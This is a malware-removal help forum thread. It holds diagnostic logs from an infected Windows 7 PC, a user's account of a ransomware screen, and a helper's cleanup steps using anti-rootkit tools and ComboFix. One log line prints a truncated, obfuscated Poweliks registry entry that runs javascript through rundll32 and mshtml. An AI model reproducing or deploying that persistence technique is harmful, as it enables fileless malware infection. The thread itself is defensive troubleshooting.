The Secret of Monkey Island: Special Edition (HKLM-x32\...\Steam App 32360) (Version:  - LucasArts)
The Talos Principle Public Test (HKLM-x32\...\Steam App 330710) (Version:  - Croteam)
TightVNC 2.0.2 (HKLM-x32\...\TightVNC) (Version: 2.0.2 - GlavSoft LLC.)
Unity Web Player (HKU\S-1-5-21-2217723503-548262416-3983414958-1007\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Uplay (HKLM-x32\...\Uplay) (Version: 2.0 - Ubisoft)
Valiant Hearts: The Great War™ / Soldats Inconnus : Mémoires de la Grande Guerre™ (HKLM-x32\...\Steam App 260230) (Version:  - Ubisoft Montpellier)
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows XP Mode (HKLM\...\{1374CC63-B520-4f3f-98E8-E9020BF01CFF}) (Version: 1.3.7600.16423 - Microsoft Corporation)
World of Goo (HKLM-x32\...\Steam App 22000) (Version:  - 2D BOY)
Ziggurat (HKLM-x32\...\Steam App 308420) (Version:  - Milkstone Studios)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-2217723503-548262416-3983414958-1007_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
 
==================== Restore Points  =========================
 
10-11-2014 00:40:03 Windows Update
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-13 21:34 - 2012-08-14 09:13 - 00000968 ____A C:\Windows\system32\Drivers\etc\hosts
10.100.5.252 bmtex2010
172.20.16.155 grfdfs
10.100.5.50 stl2k3ns1
10.100.5.51 stl2k3ns2
10.100.5.52 stl2k3dc1
10.100.5.53 stl2k3dc2
 
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {2F324146-BA28-46F8-A8E2-C8E487EF7EBB} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-09-18] (Google Inc.)
Task: {482D745E-ECAD-4DD7-ABB2-87622D2AD612} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2013-05-13] (Microsoft Corporation)
Task: {5447ECDB-2C78-401D-BFAE-F7C6E6F830AF} - System32\Tasks\Overwolf Updater Task => C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe [2014-10-22] (Overwolf LTD)
Task: {A9237A40-FCB0-40E2-B712-4D310799122D} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2013-05-13] (Microsoft Corporation)
Task: {AA3A2AC5-53FF-4D70-B6F1-39A55FA7BA06} - System32\Tasks\Microsoft_MKC_Logon_Task_ipoint.exe => C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2013-05-13] (Microsoft Corporation)
Task: {AAFD7EB2-F0DF-4E39-8C89-8F15B716ED81} - System32\Tasks\Microsoft_MKC_Logon_Task_itype.exe => C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2013-05-13] (Microsoft Corporation)
Task: {B3E7C114-D31F-402A-9253-A4FB8DCB1E3B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-09-18] (Google Inc.)
Task: {DF3E1F4C-B60E-4DFD-93A5-91A4BD728439} - System32\Tasks\{44A1741A-3325-5E3D-3774-F73A5D212500} => C:\Users\Calahan\AppData\Roaming\BMMCegjc\BfVFqtQW\sSmQiMZV\HDDIaJDbA.exe <==== ATTENTION
Task: {E9004E9C-6652-4A05-ABDD-0AE18E65854F} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-24] (Adobe Systems Incorporated)
Task: {EF3C8A0C-24A9-4BAE-9739-B91FE7A27393} - System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\mousekeyboardcenter.exe [2013-05-13] (Microsoft)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
 
==================== Loaded Modules (whitelisted) =============
 
2014-02-28 17:18 - 2014-02-28 17:18 - 00075136 _____ () C:\Windows\SysWOW64\PnkBstrA.exe
2013-09-05 00:17 - 2013-09-05 00:17 - 04300456 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 14:23 - 2010-10-20 14:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2010-01-02 09:42 - 2010-01-02 09:42 - 00098304 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext_64.dll
2009-11-24 18:36 - 2009-11-24 18:36 - 00125440 _____ () C:\Program Files (x86)\Notepad++\NppShell_01.dll
2014-06-27 17:44 - 2011-12-01 14:15 - 00777448 ____N () C:\Program Files\Plantronics\GameCom780\GameCom780.exe
2012-09-13 00:38 - 2012-09-13 00:38 - 00264040 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\CameraHelperShell.exe
2014-11-10 21:15 - 2014-11-10 21:16 - 00380416 _____ () C:\Users\Calahan\Downloads\nffvqpeh.exe
2014-06-27 17:44 - 2011-12-01 14:16 - 00150760 ____N () C:\Program Files\Plantronics\GameCom780\VmixPLGC.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 02144104 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtCore4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 07955304 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtGui4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 00341352 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtXml4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 00028008 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QGif4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 00127336 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QJpeg4.dll
2012-09-13 00:39 - 2012-09-13 00:39 - 00336232 _____ () C:\Program Files (x86)\Common Files\logishrd\LWSPlugins\LWS\Applets\CameraHelper\DevManagerCore.dll
2013-09-05 00:14 - 2013-09-05 00:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 14:45 - 2010-10-20 14:45 - 08801120 _____ () C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2011-11-08 15:46 - 2011-11-08 15:46 - 00093696 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext.dll
2014-10-29 11:26 - 2014-10-21 23:04 - 01042760 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\libglesv2.dll
2014-10-29 11:26 - 2014-10-21 23:04 - 00211272 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\libegl.dll
2014-10-29 11:26 - 2014-10-21 23:04 - 08910664 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\pdf.dll
2014-10-29 11:26 - 2014-10-21 23:04 - 01681224 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\ffmpegsumo.dll
2014-10-29 11:26 - 2014-10-21 23:05 - 14902600 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\PepperFlash\pepflashplayer.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
 
========================= Accounts: ==========================
 
Administrator (S-1-5-21-2217723503-548262416-3983414958-500 - Administrator - Disabled) => C:\Users\Administrator.cvci20462
Calahan (S-1-5-21-2217723503-548262416-3983414958-1007 - Administrator - Enabled) => C:\Users\Calahan
Elisa (S-1-5-21-2217723503-548262416-3983414958-1006 - Limited - Enabled) => C:\Users\Elisa
Guest (S-1-5-21-2217723503-548262416-3983414958-501 - Limited - Enabled) => C:\Users\Guest
HomeGroupUser$ (S-1-5-21-2217723503-548262416-3983414958-1003 - Limited - Enabled)
Logan (S-1-5-21-2217723503-548262416-3983414958-1005 - Administrator - Enabled) => C:\Users\Logan
Mike2 (S-1-5-21-2217723503-548262416-3983414958-1004 - Administrator - Enabled) => C:\Users\Mike2
 
==================== Faulty Device Manager Devices =============
 
Name: PS/2 Compatible Mouse
Description: PS/2 Compatible Mouse
Class Guid: {4d36e96f-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (11/10/2014 08:21:27 PM) (Source: MsiInstaller) (EventID: 1024) (User: HP8100-2)
Description: Product: Adobe Reader XI - Update '{AC76BA86-7AD7-0000-2550-7A8C40011009}' could not be installed. Error code 1625. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft.com/fwlink/?LinkId=23127
 
Error: (11/10/2014 06:53:03 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: accrdsub.exe, version: 6.2.1.52, time stamp: 0x4a266469
Faulting module name: ntdll.dll, version: 6.1.7601.18247, time stamp: 0x521eaf24
Exception code: 0xc0000005
Fault offset: 0x0000000000052eef
Faulting process id: 0x838
Faulting application start time: 0xaccrdsub.exe0
Faulting application path: accrdsub.exe1
Faulting module path: accrdsub.exe2
Report Id: accrdsub.exe3
 
Error: (11/09/2014 10:52:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 9.0.8112.16584, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x08356020
Faulting process id: 0x4bc
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (11/09/2014 10:52:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 9.0.8112.16584, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0840e020
Faulting process id: 0x2e2c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (11/09/2014 10:44:48 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program iexplore.exe version 9.0.8112.16584 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 2074
 
Start Time: 01cffc98a2a67803
 
Termination Time: 10
 
Application Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe
 
Report Id: e82a2d01-688b-11e4-a553-6c626d9e55b8
 
Error: (11/09/2014 10:44:41 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 9.0.8112.16584, time stamp: 0x541caffd
Faulting module name: WININET.dll, version: 9.0.8112.16584, time stamp: 0x541cb050
Exception code: 0xc0000005
Fault offset: 0x000d4825
Faulting process id: 0x3230
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (11/08/2014 08:45:52 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: FalloutNV.exe, version: 1.4.0.525, time stamp: 0x4e0d50ed
Faulting module name: FalloutNV.exe, version: 1.4.0.525, time stamp: 0x4e0d50ed
Exception code: 0xc0000005
Fault offset: 0x004232b5
Faulting process id: 0x2c4c
Faulting application start time: 0xFalloutNV.exe0
Faulting application path: FalloutNV.exe1
Faulting module path: FalloutNV.exe2
Report Id: FalloutNV.exe3
 
Error: (11/08/2014 01:51:08 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: chrome.exe, version: 38.0.2125.111, time stamp: 0x5447163b
Faulting module name: ntdll.dll, version: 6.1.7601.18247, time stamp: 0x521ea8e7
Exception code: 0xc0000374
Fault offset: 0x000ce753
Faulting process id: 0xc10
Faulting application start time: 0xchrome.exe0
Faulting application path: chrome.exe1
Faulting module path: chrome.exe2
Report Id: chrome.exe3
 
Error: (11/08/2014 01:39:48 AM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)
Description: Chrome has encountered a fatal error.
ver=38.0.2125.111;lang=;guid=31C333B4351342D580786EE8E019F187;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\0b75c9e6-b3bb-4218-86a6-721542ef8a63.dmp
 
Error: (11/08/2014 01:37:18 AM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)
Description: Chrome has encountered a fatal error.
ver=38.0.2125.111;lang=;guid=31C333B4351342D580786EE8E019F187;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\d2a8414e-ff3e-46c5-b902-431b54a16fa7.dmp
 
 
System errors:
=============
Error: (11/10/2014 08:26:58 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 40. The internal error state is 252.
 
Error: (11/10/2014 08:26:58 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 40. The internal error state is 252.
 
Error: (11/10/2014 08:22:29 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The HP Health Check Service service failed to start due to the following error: 
%%2
 
Error: (11/10/2014 08:21:45 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (11/10/2014 08:18:50 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The DameWare Mini Remote Control service failed to start due to the following error: 
%%3
 
Error: (11/10/2014 07:57:56 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error: 
%%1068
 
Error: (11/10/2014 07:57:56 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error: 
%%1068
 
Error: (11/10/2014 07:57:56 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error: 
%%1068
 
Error: (11/10/2014 07:57:56 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error: 
%%1068
 
Error: (11/10/2014 07:57:56 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error: 
%%1068
 
 
Microsoft Office Sessions:
=========================
Error: (11/10/2014 08:21:27 PM) (Source: MsiInstaller) (EventID: 1024) (User: HP8100-2)
Description: Adobe Reader XI{AC76BA86-7AD7-0000-2550-7A8C40011009}1625(NULL)(NULL)(NULL)
 
Error: (11/10/2014 06:53:03 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: accrdsub.exe6.2.1.524a266469ntdll.dll6.1.7601.18247521eaf24c00000050000000000052eef83801cff7cbaa298beaC:\Program Files\ActivIdentity\ActivClient\accrdsub.exeC:\Windows\SYSTEM32\ntdll.dllb5425d6b-6934-11e4-a553-6c626d9e55b8
 
Error: (11/09/2014 10:52:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe9.0.8112.165844a5bc6b7unknown0.0.0.000000000c0000005083560204bc01cffc99acb61f44C:\Program Files\Internet Explorer\iexplore.exeunknown07177948-688d-11e4-a553-6c626d9e55b8
 
Error: (11/09/2014 10:52:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe9.0.8112.165844a5bc6b7unknown0.0.0.000000000c00000050840e0202e2c01cffc99acb58302C:\Program Files\Internet Explorer\iexplore.exeunknown0717a058-688d-11e4-a553-6c626d9e55b8
 
Error: (11/09/2014 10:44:48 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: iexplore.exe9.0.8112.16584207401cffc98a2a6780310C:\Program Files (x86)\Internet Explorer\iexplore.exee82a2d01-688b-11e4-a553-6c626d9e55b8
 
Error: (11/09/2014 10:44:41 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe9.0.8112.16584541caffdWININET.dll9.0.8112.16584541cb050c0000005000d4825323001cffc98a390db72C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\syswow64\WININET.dlle64fc0be-688b-11e4-a553-6c626d9e55b8
 
Error: (11/08/2014 08:45:52 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: FalloutNV.exe1.4.0.5254e0d50edFalloutNV.exe1.4.0.5254e0d50edc0000005004232b52c4c01cffb75dc2e1c3cC:\Program Files (x86)\Steam\steamapps\common\Fallout New Vegas\FalloutNV.exeC:\Program Files (x86)\Steam\steamapps\common\Fallout New Vegas\FalloutNV.exe2309037f-67b2-11e4-a553-6c626d9e55b8
 
Error: (11/08/2014 01:51:08 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: chrome.exe38.0.2125.1115447163bntdll.dll6.1.7601.18247521ea8e7c0000374000ce753c1001cffb1f87a3d830C:\Program Files (x86)\Google\Chrome\Application\chrome.exeC:\Windows\SysWOW64\ntdll.dll9d5c5460-6713-11e4-a553-6c626d9e55b8
 
Error: (11/08/2014 01:39:48 AM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)
Description: Chrome has encountered a fatal error.
ver=38.0.2125.111;lang=;guid=31C333B4351342D580786EE8E019F187;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\0b75c9e6-b3bb-4218-86a6-721542ef8a63.dmp
 
Error: (11/08/2014 01:37:18 AM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)
Description: Chrome has encountered a fatal error.
ver=38.0.2125.111;lang=;guid=31C333B4351342D580786EE8E019F187;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\d2a8414e-ff3e-46c5-b902-431b54a16fa7.dmp
 
 
CodeIntegrity Errors:
===================================
  Date: 2011-12-05 22:19:14.852
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-05 22:10:09.618
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-05 22:03:00.342
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-05 21:51:41.439
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-05 21:41:31.323
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-01 21:31:57.630
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-01 19:53:29.363
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-01 18:55:19.639
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-11-30 20:37:01.322
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-11-30 20:22:56.207
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core i5 CPU 750 @ 2.67GHz
Percentage of memory in use: 43%
Total physical RAM: 4031.29 MB
Available physical RAM: 2292.86 MB
Total Pagefile: 8060.76 MB
Available Pagefile: 5054.2 MB
Total Virtual: 8192 MB
Available Virtual: 8191.82 MB
 
==================== Drives ================================
 
Drive c: (Hard Drive) (Fixed) (Total:289.83 GB) (Free:29.36 GB) NTFS
Drive d: (HP_RECOVERY) (Fixed) (Total:6.25 GB) (Free:0.77 GB) NTFS ==>[system with boot components (obtained from reading drive)]
Drive f: (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS ==>[system with boot components (obtained from reading drive)]
Drive g: () (Fixed) (Total:232.68 GB) (Free:9.99 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: 6233878F)
Partition 1: (Active) - (Size=2 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=289.8 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=6.2 GB) - (Type=07 NTFS)
 
========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 232.8 GB) (Disk ID: 08000000)
Partition 1: (Not Active) - (Size=47 MB) - (Type=DE)
Partition 2: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=232.7 GB) - (Type=07 NTFS)
 
==================== End Of Log ============================

 


Well, I have the GMER .txt, but once the scan finished, everything went to Hell in a grenade basket. Malwarebytes real-time protection stopped working, and I couldn't fix it. Then I realised there was a litany of processes running that were rather hoodlum looking. Ended the good ol' dllhost.exe process, and my computer decided to commit seppuku and blue screened. Was rather terrifying. Here's the GMER .txt. By the way, someone missed a purely amazing opportunity to name a program that is used to fight computer viruses GERM. Would have been brilliant.

 

Blue Screen/Crash stuff.

Problem signature:
  Problem Event Name: BlueScreen
  OS Version: 6.1.7601.2.1.0.256.48
  Locale ID: 1033
 
Additional information about the problem:
  BCCode: 1000007e
  BCP1: FFFFFFFFC0000005
  BCP2: FFFFF80002FBBA9B
  BCP3: FFFFF880033AF7F8
  BCP4: FFFFF880033AF050
  OS Version: 6_1_7601
  Service Pack: 1_0
  Product: 256_1
 
Files that help describe the problem:
  C:\Windows\Minidump\111114-83413-01.dmp
  C:\Users\Calahan\AppData\Local\Temp\WER-94957-0.sysdata.xml
 
Read our privacy statement online:
 
If the online privacy statement is not available, please read our privacy statement offline:
  C:\Windows\system32\en-US\erofflps.txt
 

 

 

GMER

 

GMER 2.1.19357 - http://www.gmer.net
Rootkit scan 2014-11-10 23:56:23
Windows 6.1.7601 Service Pack 1 x64 \Device\Harddisk0\DR0 -> \Device\Ide\IAAStorageDevice-1 WDC_WD32 rev.03.0 298.09GB
Running: nffvqpeh.exe; Driver: C:\Users\Calahan\AppData\Local\Temp\uxryipod.sys
 
 
---- Threads - GMER 2.1 ----
 
Thread  C:\Windows\System32\svchost.exe [412:3808]                                  000007fee4453efc
Thread  C:\Windows\System32\svchost.exe [412:2376]                                  000007fee44f8a4c
Thread  C:\Windows\system32\svchost.exe [740:6560]                                  000007fefc781ab0
Thread  C:\Windows\system32\svchost.exe [740:13108]                                 000007fefc7a4164
Thread  C:\Windows\system32\svchost.exe [1136:2820]                                 000007fee488d3c8
Thread  C:\Windows\system32\svchost.exe [1136:3032]                                 000007fee488d3c8
Thread  C:\Windows\system32\svchost.exe [1136:880]                                  000007fee488d3c8
Thread  C:\Windows\system32\svchost.exe [1136:3424]                                 000007fee488d3c8
Thread  C:\Windows\System32\spoolsv.exe [1616:2504]                                 000007fef7f010c8
Thread  C:\Windows\System32\spoolsv.exe [1616:2508]                                 000007fef7e86144
Thread  C:\Windows\System32\spoolsv.exe [1616:2512]                                 000007fef8775fd0
Thread  C:\Windows\System32\spoolsv.exe [1616:2516]                                 000007fef7e63438
Thread  C:\Windows\System32\spoolsv.exe [1616:2520]                                 000007fef87763ec
Thread  C:\Windows\System32\spoolsv.exe [1616:2528]                                 000007fef9135e5c
Thread  C:\Windows\System32\spoolsv.exe [1616:2952]                                 000007fef91e5074
Thread  C:\Windows\System32\spoolsv.exe [1616:2124]                                 000007fef9252288
Thread  C:\Windows\System32\spoolsv.exe [1616:3116]                                 000007fef7f58760
Thread  C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [1720:2452]  000007fef7d94094
Thread  C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [1720:1320]  000007fef7d94094
Thread  C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [1720:2624]  000007fef421c680
 
---- EOF - GMER 2.1 ----

Welp, I had my computer running in Safe-Mode, trying to keep tabs on if someone responded yet to this thread, and Internet Explorer reared up and was telling me my files were being encrypted. Obvious ransomware. Came outa nowhere. That computer is now off. It was in the vein of Crypto. Can't quite remember what. Read something quickly about RSA and powered my computer down. Not even Safe-Mode is safe.


These steps are for Vitharr only. If you are a casual viewer, do NOT try this on your system!
If you are not Vitharr and have a similar problem, do NOT post here; start your own topic.

 

 

Hello Vitharr.

 

Your system is a victim of the Poweliks malware. Please make sure to only "attach" reports as we go forward. Do not copy and paste in-line.

 

Do not run or start any other programs while these utilities and tools are in use!
Do NOT run any other tools on your own or do any fixes other than what is listed here.
If you have questions, please ask before you do something on your own.
 
Close any of your open programs while you run these tools.

IF and only if you have any previous copy of our anti-rootkit tool,  "mbar.exe"  ..... then delete it now.


Please download Malwarebytes Anti-Rootkit (MBAR)  and save it to your desktop,
from here   
http://downloads.malwarebytes.org/file/mbar

•Be sure to print out ( if possible) and follow the instructions provided on that same page.

•Doubleclick on the MBAR-1.0.8.1.1001.exe file you downloaded and approve the UAC prompt in Vista and newer operating systems.

 

•Click **OK** on the next screen, to allow the package to extract the contents of the file to its own folder, mbar.

 

mbar.exe will launch automatically. On some systems, this may take a few extra seconds. Please be patient and wait for the program to open.
•After reading the Introduction, click '**Next**' if you agree.

 

•On the Update Database screen, click on the '**Update**' button.
•Once you see 'Success: Database was successfully updated' click on 'Next'.
•Click the '**Scan**' button.

With some infections, you may see two message boxes.
  1.'Could not load protection driver'. Click 'OK'.
  2.'Could not load DDA driver'. Click 'Yes' to this message, to allow the driver to load after a restart. Allow the computer to restart. Continue with the rest of these instructions.
 

 

When the Scan has completed, click the '**CleanUp**' button and allow the reboot if prompted.

Perform another scan with Malwarebytes Anti-Rootkit to verify that no threats remain.
 

 

Then, please send the following logs as attachments to your reply. These logs are located in the mbar folder on your desktop where the tool extracted itself to.

**mbar-log-2014-11-14 (xx-xx-xx).txt** (where xx-xx-xx is the date and time of the scan)
+ also
**system-log.txt**

I need to have both of those files attached in your next reply.  Thanks.  **Send even if nothing is reported as detected. Always send these.**


This pc had multiple malware infections, including a cryptowall ransomware. Were you aware of the latter?

 

DECRYPT_INSTRUCTION.HTML (CryptoWall.Trace) -> Delete on reboot. [1500f448f38951e533e864dedd26718f]
C:\Users\Calahan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECRYPT_INSTRUCTION.TXT (CryptoWall.Trace) -> Delete on reboot. [b164f547cbb11d1936e5e85a41c236ca]
C:\Users\Calahan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECRYPT_INSTRUCTION.URL (CryptoWall.Trace

 

To empty out temporary file areas, do this:

Download TFC by OldTimer to your desktop

  • Please double-click TFC.exe to run it. (Note: If you are running on Vista or Windows 7, right-click on the file and choose Run As Administrator).
  • It will close all programs when run, so make sure you have saved all your work before you begin.
  • Click the Start button to begin the process. Depending on how often you clean temp files, execution time should be anywhere from a few seconds to a minute or two.  Let it run uninterrupted to completion.
  • IF prompted to Reboot, reply "Yes".

 

 

 

NEXT:

Download ComboFix from here and save it to your desktop.

http://download.bleepingcomputer.com/sUBs/ComboFix.exe

Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with ComboFix.

You can get help on disabling your protection programs here:
http://www.techsupportforum.com/security-center/virus-trojan-spyware-help/490111-how-disable-your-security-applications.html

Double click on ComboFix.exe & follow the prompts.

Your desktop may go blank. This is normal. It will return when ComboFix is done. ComboFix may reboot your machine. This is normal.

When finished, it shall produce a log for you, C:\ComboFix.txt. Attach that log in your next reply.

NOTE: If you encounter a message "illegal operation attempted on registry key that has been marked for deletion" and no programs will run - please just reboot and that will resolve that error.
 


